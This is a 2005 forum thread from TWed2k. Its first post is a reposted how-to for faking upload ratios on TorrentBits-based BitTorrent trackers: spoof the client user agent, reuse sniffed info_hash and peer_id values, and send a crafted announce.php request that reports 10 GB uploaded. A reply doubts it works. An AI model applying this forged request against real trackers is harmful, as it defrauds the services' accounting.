» 遊客:  加入 | 登入 (帳號有問題請連絡TWed2k@gmail.com)


 


 TWed2k » BiTorrent 問題區 » [18禁][新聞] BT 出現可修改上下傳比率的安全漏洞 RSS   



  可打印版本 | 推薦給朋友 | 訂閱主題 | 收藏主題 | 純文字版  


 

 
主題: [18禁][新聞] BT 出現可修改上下傳比率的安全漏洞   字型大小:||| 
innova
銀驢友〔高級〕
等級: 14等級: 14等級: 14等級: 14


十週年紀念徽章(五級)  

今日心情

 . 積分: 916
 . 文章: 2714
 . 收花: 7188 支
 . 送花: 1461 支
 . 比例: 0.2
 . 在線: 2182 小時
 . 瀏覽: 15182 頁
 . 註冊: 6971
 . 失蹤: 3
 . 火星
#1 : 2005-9-22 02:28 AM     只看本作者 送鮮花給本文章,以表示喜愛之意,點花數可看送花者名單送花 (0) 引言回覆
BT 出現可修改上下傳比率的安全漏洞
Increase your upload/download/ratio in torrent trackers
http://xyflar.blogspot.com/

作者發現透過一般可以擷取 HTTP 協定的 sniffer,在搭配 Firefox 以及
User Agent Switcher 這個 Extension 還有任何以 bittorrent 原始碼研
發而成的各種 BT Client,就能夠將 Firefox 偽裝成一個 client 欺騙以
TorrentBits 原始碼開發而成的 tracker 藉此修改上下傳的比率,來提升
等級。

1. 用 User Agent Switcher Extension 切換成 BitTorrent/3.4.2
2. 開啟 sniffer 記錄並且啟動 BT client 隨便選個 torrent 開始下載。
3. 下面是 Firefox 要貼上的網址,來源參考 sniffer 抓到的內容:

http://TRACKER.ADDRESS/announce.php?
info_hash=INFOHASH
&peer_id=PEERID
&port=PORT
&uploaded=UPLOADED
&downloaded=0
&left=0
&numwant=0
&event=completed

Replace:

    TRACKER.ADDRESS with the torrent tracker address (ex:
                    www.filelist.org:81)
    INFOHASH with info_hash variable taken from the GET request
             from HTTP Analyzer,
    PEERID with the peer_id
    PORT with the port
    UPLOADED with an number that you want, in bytes (ex:
             10737418240 for 10GB)

Example:

http://www.filemp3.org:81/announce.php?
info_hash=%B5%2D%F4%ADM%18%7C%83C%E9%EC%C8%C7%F7%973%3Fap%15
&peer_id=%2DBC0059%2D%C3F%A4c%C4%0D%D35i%93%93%EA
&
&port=12345
&uploaded=10737418240
&downloaded=0
&left=0
&numwant=0
&event=completed

4. 關閉 BT client

5. 嘿嘿... tracker 上面已經顯示你送出了 10GB 的檔案,等級提高了...

--
雖然目前仍看不太懂...


[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  訪問主頁  發私人訊息  Blog  快速回覆 新增/修改 爬文標記
Acute
論壇第一大毒王
等級: 18等級: 18等級: 18等級: 18等級: 18
論壇第一小神童

 . 積分: 3281
 . 精華: 8
 . 文章: 11574
 . 收花: 14037 支
 . 送花: 3260 支
 . 比例: 0.23
 . 在線: 323 小時
 . 瀏覽: 2250 頁
 . 註冊: 8013
 . 失蹤: 5366
#2 : 2005-9-22 06:40 AM     只看本作者 送鮮花給本文章,以表示喜愛之意,點花數可看送花者名單送花 (0) 引言回覆
這要看BT client 怎樣寫, 未必有效
以前的Azurues 是根據誰傳過來比較多, 就優先回傳給對方, 所以, 跟tracker server 的任何記錄都沒有關連
我用BitComet 的感覺, 也是差不多, 上傳開大, 下載就會跟著變大, 顯然BitComet 也有類似機制
更早以前用Python 寫的一些BT client, 都是採用掃描式傳送法, 也就是, 根據名單, 從頭到尾掃一次, 不管對方傳輸多少, 只要連的上, 就傳一定數量, 然後換下一個, 整個名單掃完, 再從頭來一次.
只有BT Client 自己本身沒有計算接收自何者的資料多寡資訊, 又希望屏除早期的掃描式傳輸模式, 才有可能去用tracker 的資料, 但是, 我沒看過這樣的client 程式

Acute.


[如果你喜歡本文章,就按本文章之鮮花~送花給作者吧,你的支持就是別人的動力來源]
本文連接  
檢閱個人資料  發私人訊息  Blog  快速回覆 新增/修改 爬文標記

   

快速回覆
表情符號

更多 Smilies

字型大小 : |||      [完成後可按 Ctrl+Enter 發佈]        

溫馨提示:本區開放遊客瀏覽。
選項:
關閉 URL 識別    關閉 表情符號    關閉 Discuz! 代碼    使用個人簽名    接收新回覆信件通知
發表時自動複製內容   [立即複製] (IE only)


 



所在時區為 GMT+8, 現在時間是 2024-5-3 11:09 PM		 清除 Cookies - 連絡我們 - TWed2k © 2001-2046 - 純文字版 - 說明
Discuz! 0.1 | Processed in 0.018019 second(s), 6 queries , Qzip disabled